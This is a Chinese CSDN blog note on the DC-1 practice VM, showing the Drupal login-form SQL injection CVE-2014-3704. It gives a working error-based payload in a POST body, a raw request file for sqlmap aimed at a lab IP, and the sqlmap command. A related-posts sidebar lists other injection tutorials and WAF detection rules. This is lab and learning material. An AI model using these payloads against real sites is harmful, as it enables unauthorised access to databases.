DC-1 登录框的sql注入

已于 2022-12-04 22:25:27 修改
阅读量1.1k 收藏 1
点赞数 3
文章标签: sql 安全
于 2022-12-04 20:29:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a_153161/article/details/128176921
版权

DC-1 登录框的SQL注入 CVE-2014-3704

看了很多文章都没有提及到这个漏洞,偶然在其他博主那里看到还有这个漏洞是其他文章都没有提及到的,做个笔记。

使用POST方法,路径是

/?q=node&destination=node

body:

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

报错注入,显示数据库名是 drupaldb
在这里插入图片描述
使用sqlmap
new1.txt:

POST /?q=node&destination=node HTTP/1.1
Host: 192.168.10.133
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,*),0)%23]=bob&name[0]=a

python3 .\sqlmap.py -r "C:\Users\zen\Desktop\new1.txt" --dbs --batch

在这里插入图片描述

Zegbton
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 登录注入_sqlmap之(六)----POST登陆注入实战
weixin_30698775的博客
01-19 657
利用sqlmap进行POST注入,常见的有三种方法:注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py-r"c:\Users\fendo\Desktop\post.txt"-pn--dbs注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end D...
HTB_Appointment 靶机之登录万能密码、sqlmap post 注入
网络安全学习
04-22 3899
⚔ 🧱 YOU NEED TO WALK BEFORE YOU CAN RUN 🧱⚔ 文章目录先放答案万能密码注入sqlmap post 注入测试是否存在注入查数据库查表查列查数据 先放答案 因为这期问题都比较简单,简单到我想不到讲什么把它们串到一起,索性就直接放答案了 Structured Query Language SQL Injection personally identifiable information A03:2021-Injection Apache httpd 2.4.38 ((.
sql注入实战
qq_64875725的博客
04-17 119
sql注入的原理是吧用户输入的数据都当做代码来执行,最终达到将欺骗服务器的恶意指令输入数据库中。首先,寻找注入点,常见的注入点用户的登陆界面,搜索等。id = 1' and '1' = '2 返回失败。id = 1' and '1' ='1 返回成功。id = 100 and 1=1 返回正常。id = 100 and 1=1 返回成功。id = 100 and 1=2 返回失败。ID=100’ 返回错误说明可能存在注入。id =100 and 1=2 返回错误。满足以上三点,说明存在注入点。
综合案例(账号密码登录SQL注入
最新发布
IT深耕十余载,大道之简
05-02 1081
在后台,我们使用SQL查询语句来验证用户输入的用户名和密码是否与数据库中存储的相匹配。然而,如果我们在编写上述SQL查询语句时没有对用户输入进行适当的过滤或转义,就可能会面临SQL注入的风险。攻击者可以在用户名或密码的输入中输入一些特殊字符,从而改变SQL查询语句的语义,达到绕过登录验证或窃取数据的目的。当用户输入用户名和密码后,后台会执行一条SQL查询语句来验证输入的用户名和密码是否与数据库中存储的相匹配。始终为真,所以这个查询语句会返回数据库中所有的用户数据,从而绕过了登录验证。
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1864
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
Web安全SQL注入
weixin_52741673的博客
07-16 392
Web安全SQL注入
sql注入学习——使用sql注入进行登录,使用union进行攻击注入
Demonslzh的博客
06-27 4326
1、sql注入环境搭建 为了方便对sql注入学习,我们首先搭建一个简单的web页面,数据库使用postgresql,具体页面如下 需要这个页面源码的可以去关注页面底部公众号后台回复获取 2、使用sql注入进行登录 数据库的用户信息如下 看下登录的一个主要逻辑,登录成功后前端页面显示当前用户所拥有的权限,登录失败则显示permission denied #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ 1) change to directory co
自己动手编写SQL注入漏洞扫描工具
12-31
1. **SQL注入原理**:理解注入的基本机制,如通过拼接SQL语句、利用未验证的用户输入、执行特权命令等。 2. **SQL语法知识**:了解目标数据库系统(如MySQL、Oracle或SQL Server)的SQL语法,以便构造有效的测试...
DC-1.zip.zip
12-07
在搭建点餐系统时,必须考虑到安全性,避免SQL注入、跨站脚本等常见攻击。layui本身并不直接处理这些安全问题,但作为前端架,它可以帮助我们构建出结构良好的前端,减少暴露的安全隐患。配合后台的安全措施,如...
DC-4-Web渗透测试靶机
01-19
例如,SQL注入、跨站脚本(XSS)、文件包含漏洞、命令注入等,都是常见的Web应用漏洞。 4. **漏洞利用**:利用已知的攻击手段或编写自定义exploit,尝试对目标系统进行攻击。例如,通过SQL注入获取数据库信息,或...
CLAS12-DC-Database
05-18
8. **安全性**:在数据库操作中,必须注意SQL注入攻击,通过预编译语句(PreparedStatement)和参数化查询来防止此类攻击。同时,也要限制数据库权限,确保只有必要的操作才能执行。 9. **Spring JDBC和JPA**:...
ctf-dc
03-12
3. **Web安全**:包括SQL注入、XSS攻击、CSRF等,Python的requests库可以用来模拟HTTP请求, Burp Suite插件可以辅助进行Web渗透测试。 4. **取证分析**:参赛者需要从日志、内存快照、硬盘镜像中寻找线索。Python...
登录Tricks
Love&Share
06-28 1205
存在SQL注入的情况下,有可能使用万能密码直接登录 有超级多存在SQL注入的话直接注出账密有些可以构造用户注入登录,比如熊海cms后台登录处存在sql注入 这里万能密码起不到作用,因为他是通过用户名去数据库查密码,再进行匹配,还有一种方法非常巧妙 这是mysql的特性, 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据,就相当于构造了一个虚拟账户,可以使用这个账户登录列举几种找未授权访问的方法使用的组件可能会出现漏洞,常用的未授权漏洞,对于端口的收集也至关重要,可以提高漏洞利用面注册用户 覆盖掉原
登录注入笔记
weixin_34233421的博客
11-28 367
2019独角兽企业重金招聘Python工程师标准>>> ...
用户登录页面--SQL注入
热门推荐
李书明(石家庄)的专栏
01-23 1万+
web网站攻击方式多种多样,sql注入是经常使用的攻击方向。攻击者把SQL命令插入到Web表单的输入域或页面请求的字符串,欺骗服务器执行恶意的SQL命令 SQL注入不是Web或数据库服务器中的缺陷,而是由于编程实践较差且缺乏经验而导致的。 动态拼接的SQL指令最易受攻击。 如登录时使用的SQL指令: $query = 'SELECT * from Users WHERE login = ' ...
Vulnhub[DC1]
Townmacro的博客
06-10 106
kali中使用arp-scan进行主机探活 经过筛选可以知道192.168.0.150 是DC-1的ip 可以这里开启了22、80、111端口我们先从80端口入手这里可以发现用的是DrupalCMS启动msf,搜索下Drupal可用的EXP 这里我们选用exploit/unix/webapp/drupal_drupalgeddon2因为他是最新的,而且品质为excellent 这样我们就可以成功得到一个会话。我们用会话返回一个shell查看目录,获取flag1这里也就是提示说去查看DrupalC
MySQl登录实例的SQL注入问题
weixin_51232559的博客
07-01 1204
SQL注入问题想必大家都会有所听闻,因为也许大家都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一般用的就是SQL注入方法。SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。...
SQL注入绕过
HOU_XIAO_BAI的博客
11-23 884
strcmp(str1,str2):若所有的字符串均相同,则返回STRCMP(),若根据当前分类次序,第一个参数小于第二个,则返回 -1,其它情况返回 1。在MySQL里,多行解释 是 /* */,这个是SQL的标准 但是MySQL扩张了解释 的功能比如注释/**/在起头的/*后头加了!把要使用的查询语句放在/*。*/中,这样在一般的数据库是不会执行的,但是在mysql中内联注释中的语句会被执行。有的waf只会对关键词过滤一次,这时候采用双写的方式可以绕过。/**/ ,(),`,tab,两个空格。
分享一个php的防火墙,拦截SQL注入和xss
hetangyuese321的博客
09-22 554
这个是一个一个基于php的防火墙程序,拦截sql注入和xss攻击,无需服务器支持 安装 composer require xielei/waf 使用说明 $waf = new \Xielei\Waf\Waf(); $waf->run(); 自定义拦截规则 $rules = [ '\.\./', //禁用包含 ../ 的参数 '\<\?', //禁止php脚本出现 '\s*or\s+.*=.*', //匹配' or 1=1 ,防止sql注入 'select([
DC-DC转换器工作原理及模式解析
本文主要介绍了DC-DC转换器的工作原理及其常见的几种工作模式,包括Buck、Boost和Buck-Boost电路,以及正激、反激和桥式隔离变换器。这些基础知识对于初学者理解DC-DC转换器的运作机制和进行相关开发设计具有重要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值